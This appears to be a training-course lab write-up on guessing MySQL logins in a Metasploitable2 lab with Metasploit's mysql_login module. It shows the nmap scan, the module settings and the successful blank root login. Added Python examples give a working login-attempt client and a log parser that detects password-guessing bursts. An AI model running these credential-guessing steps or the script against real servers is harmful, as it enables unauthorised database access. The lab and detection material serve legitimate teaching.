Information Security (old version)/Metasploit 2016. 6. 2. 16:41
Metasploit - 05. Vulnerability discovery and attack (MySQL remote login attempt)
This material is put together for hands-on practice in a training course. If it is used for personal or malicious purposes, be aware that the legal responsibility is yours.
[Lab systems] Kali Linux, Firewall, Metasploitable2-Linux
- Use Metasploit to discover a vulnerability, then log in to MySQL remotely using a dictionary file.
[Lab steps]
Create ID/password dictionary files -> attack the MySQL login (weak credentials) -> obtain account information
Ex1) Create the username/password dictionary files
@ Kali Linux
- Create small username and password dictionary files. (On Metasploitable2-Linux the MySQL root account has no password, so the password list must contain an empty line; alternatively set BLANK_PASSWORDS to true on the module, which tries a blank password for every user.) The module output recorded further below also shows attempts for the user 'admin' with the passwords 'root' and 'admin', so the lists used when that run was captured contained those extra entries as well.
root@kali:~# cd /usr/share/metasploit-framework/data/wordlists/
root@kali:/usr/share/metasploit-framework/data/wordlists# vi user.txt
root
:wq!
root@kali:/usr/share/metasploit-framework/data/wordlists# vi pass.txt
(blank line)
root
:wq!
root@kali:/usr/share/metasploit-framework/data/wordlists# ls user.txt pass.txt
pass.txt user.txt
root@kali:/usr/share/metasploit-framework/data/wordlists# cd
root@kali:~#
Ex2) Run a db_nmap scan
- Run a db_nmap scan against the target '192.168.20.204'.
-sV: Probe open ports to determine service/version info
root@kali:~# msfconsole
msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login?
[*] Nmap: 514/tcp open shell Netkit rshd
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open shell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: 6000/tcp open X11 (access denied)
[*] Nmap: 6667/tcp open irc Unreal ircd
[*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 00:0C:29:34:5A:8A (VMware)
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 17.26 seconds
msf >
- Search for the 'mysql_login' module, load it and check its options. STOP_ON_SUCCESS is false by default, so the module keeps trying the remaining user/password pairs after a hit, and VERBOSE is true, so every attempt is printed.
msf > search mysql
~ 중간 생략 ~
msf > search mysql_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) >
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt
msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt
msf auxiliary(mysql_login) > run
[*] 192.168.20.204:3306 MYSQL - Found remote MySQL version 5.0.51a
[+] 192.168.20.204:3306 MYSQL - Success: 'root:'
[-] 192.168.20.204:3306 MYSQL - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: NO))
[-] 192.168.20.204:3306 MYSQL - LOGIN FAILED: admin:root (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 MYSQL - LOGIN FAILED: admin:admin (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >
msf auxiliary(mysql_login) > quit
root@kali:~#
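What the module does on the wire for every user:password pair, as an added example in Python (this is not code from the page or from Metasploit): read the server greeting, pull out the 20-byte salt, compute the mysql_native_password scramble (or send an empty auth response for a blank password, which is what the 'root:' success line stands for), send the HandshakeResponse41 packet and classify the reply as OK or an ERR with its code and message. The greeting bytes embedded below are constructed for the example; host, port and credentials for a live attempt are taken from the command line.

```python
"""Added example: one MySQL 4.1-protocol login attempt, the exchange that
auxiliary/scanner/mysql/mysql_login performs for each user:password pair.
Not code from the page or from Metasploit; written to show the wire format."""
import hashlib
import socket
import struct
import sys

# Client capability flags (MySQL protocol constants).
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LONG_FLAG = 0x00000004
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_CAPS = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG
               | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION)

# Constructed server greeting (protocol 10) carrying the version string from the
# scan; the salt "AAAAAAAA" + "BBBBBBBBBBBB" is made up for the example.
SAMPLE_GREETING = (
    b"\x0a" + b"5.0.51a-3ubuntu5\x00"     # protocol version, server version
    + b"\x07\x00\x00\x00"                  # connection id
    + b"A" * 8 + b"\x00"                   # salt part 1, filler
    + b"\x05\x82"                          # capability flags, low 16 bits (LE)
    + b"\x08" + b"\x02\x00" + b"\x00\x00"  # charset, status flags, caps high
    + b"\x00" + b"\x00" * 10               # auth data length, reserved
    + b"B" * 12 + b"\x00"                  # salt part 2, terminator
)


def native_password_scramble(password: str, salt: bytes) -> bytes:
    """mysql_native_password: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw))).
    An empty password is sent as an empty auth response, no hash at all."""
    if password == "":
        return b""
    stage1 = hashlib.sha1(password.encode()).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mixed = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mixed))


def parse_handshake(payload: bytes) -> dict:
    """Pull version, capabilities and the 20-byte salt out of a greeting payload."""
    if payload[0] != 0x0A:
        raise ValueError("not a protocol-10 handshake")
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode()
    pos = end + 1
    conn_id = struct.unpack_from("<I", payload, pos)[0]
    pos += 4
    salt = payload[pos:pos + 8]
    pos += 8 + 1                                   # salt part 1, filler byte
    caps = struct.unpack_from("<H", payload, pos)[0]
    pos += 2 + 1 + 2                               # caps low, charset, status
    caps |= struct.unpack_from("<H", payload, pos)[0] << 16
    pos += 2 + 1 + 10                              # caps high, auth len, reserved
    if caps & CLIENT_SECURE_CONNECTION:
        salt += payload[pos:pos + 12]              # salt part 2 (then a NUL)
    return {"version": version, "connection_id": conn_id,
            "capabilities": caps, "salt": salt}


def build_login(user: str, password: str, salt: bytes) -> bytes:
    """HandshakeResponse41 payload: caps, max packet size, charset, 23 zero
    bytes, NUL-terminated user name, then length-prefixed auth response."""
    auth = native_password_scramble(password, salt)
    body = struct.pack("<IIB23x", CLIENT_CAPS, 16 * 1024 * 1024, 0x21)
    return body + user.encode() + b"\x00" + bytes([len(auth)]) + auth


def frame(payload: bytes, seq: int) -> bytes:
    """Prepend the 4-byte MySQL packet header: 3-byte LE length + sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def classify_reply(payload: bytes) -> str:
    """OK packet -> 'OK'; ERR packet -> 'ERR <code>: <message>'."""
    if payload[0] == 0x00:
        return "OK"
    if payload[0] == 0xFF:
        code = struct.unpack_from("<H", payload, 1)[0]
        pos = 3
        if payload[pos:pos + 1] == b"#":           # protocol-41 SQLSTATE marker
            pos += 6
        return f"ERR {code}: {payload[pos:].decode(errors='replace')}"
    return "unexpected reply"


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed")
        buf += chunk
    return buf


def _read_packet(sock: socket.socket) -> bytes:
    header = _recv_exact(sock, 4)
    return _recv_exact(sock, int.from_bytes(header[:3], "little"))


def try_login(host: str, port: int, user: str, password: str, timeout=5.0):
    """Run the greeting / login / reply exchange once against a live server."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        hs = parse_handshake(_read_packet(s))
        s.sendall(frame(build_login(user, password, hs["salt"]), 1))
        return hs["version"], classify_reply(_read_packet(s))


if __name__ == "__main__":
    # Offline: show the blank-password login packet for root against the sample greeting.
    hs = parse_handshake(SAMPLE_GREETING)
    print(hs["version"], frame(build_login("root", "", hs["salt"]), 1).hex())
    # Online (your own lab host): python3 mysql_probe.py <host> <port> <user> [password]
    if len(sys.argv) >= 4:
        pw = sys.argv[4] if len(sys.argv) > 4 else ""
        print(try_login(sys.argv[1], int(sys.argv[2]), sys.argv[3], pw))
```

The scramble is keyed by the per-connection salt, so a captured login packet cannot be replayed; the blank-password case bypasses it entirely, which is why an account with no password is trivially guessable by any scanner regardless of the hashing scheme.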
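From the defender's side, the same run shows up on the MySQL server as a burst of "Access denied for user ... (using password: YES/NO)" warnings from one source address (192.168.20.50, the Kali box, in the output above). The following added example, not from the page, parses such lines and flags a source that produces a burst of denials, reporting the user names tried and how many attempts used a blank password. The log lines are constructed in the MySQL 5.x error-log style and assume log_warnings is at least 2 so that denials are written to the error log; the threshold and gap values are illustrative.

```python
"""Added example: flag password guessing against MySQL from the server's own
'Access denied' warnings. Not from the page; the sample lines are constructed
in the MySQL 5.x error-log style (assumption: log_warnings >= 2)."""
import json
import re
import sys
from collections import defaultdict
from datetime import datetime

# Constructed sample log: four denials from one host inside two seconds, one
# lone denial from another host, and one unrelated line.
SAMPLE_LOG = """\
160602 16:30:01 [Warning] Access denied for user 'admin'@'192.168.20.50' (using password: NO)
160602 16:30:01 [Warning] Access denied for user 'admin'@'192.168.20.50' (using password: YES)
160602 16:30:02 [Warning] Access denied for user 'admin'@'192.168.20.50' (using password: YES)
160602 16:30:02 [Warning] Access denied for user 'root'@'192.168.20.50' (using password: YES)
160602 16:45:10 [Warning] Access denied for user 'app'@'192.168.20.77' (using password: YES)
160602 16:45:11 [Note] InnoDB: Starting shutdown...
"""

DENIAL_RE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)' \(using password: (?P<pw>YES|NO)\)"
)


def parse_denials(text: str) -> list:
    """Return (timestamp, source host, user, blank_password) for each denial line."""
    events = []
    for line in text.splitlines():
        m = DENIAL_RE.match(line)
        if not m:
            continue                              # not a denial line
        ts = datetime.strptime(" ".join(m["ts"].split()), "%y%m%d %H:%M:%S")
        events.append((ts, m["host"], m["user"], m["pw"] == "NO"))
    return events


def detect_bruteforce(events: list, threshold: int = 3, gap_s: int = 60) -> list:
    """Group each source host's denials into bursts (consecutive denials no more
    than gap_s apart) and report every burst with at least threshold entries."""
    by_host = defaultdict(list)
    for ev in sorted(events):
        by_host[ev[1]].append(ev)
    alerts = []
    for host, evs in by_host.items():
        burst = []
        for ev in evs + [None]:                   # None flushes the last burst
            if ev and burst and (ev[0] - burst[-1][0]).total_seconds() <= gap_s:
                burst.append(ev)
                continue
            if len(burst) >= threshold:
                alerts.append({
                    "host": host,
                    "count": len(burst),
                    "users": sorted({u for _, _, u, _ in burst}),
                    "blank_password_tries": sum(1 for _, _, _, b in burst if b),
                    "first": burst[0][0].isoformat(),
                    "last": burst[-1][0].isoformat(),
                })
            burst = [ev] if ev else []
    return alerts


if __name__ == "__main__":
    # Usage: python3 mysql_denials.py [/path/to/mysql-error.log]; defaults to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(json.dumps(detect_bruteforce(parse_denials(text)), indent=2))
```

A successful guess does not produce a denial, so pair this with the general query log (or connection auditing) to catch the 'root:' hit itself; the burst of failures from the same address immediately before it is the indicator that the success was guessed rather than legitimate.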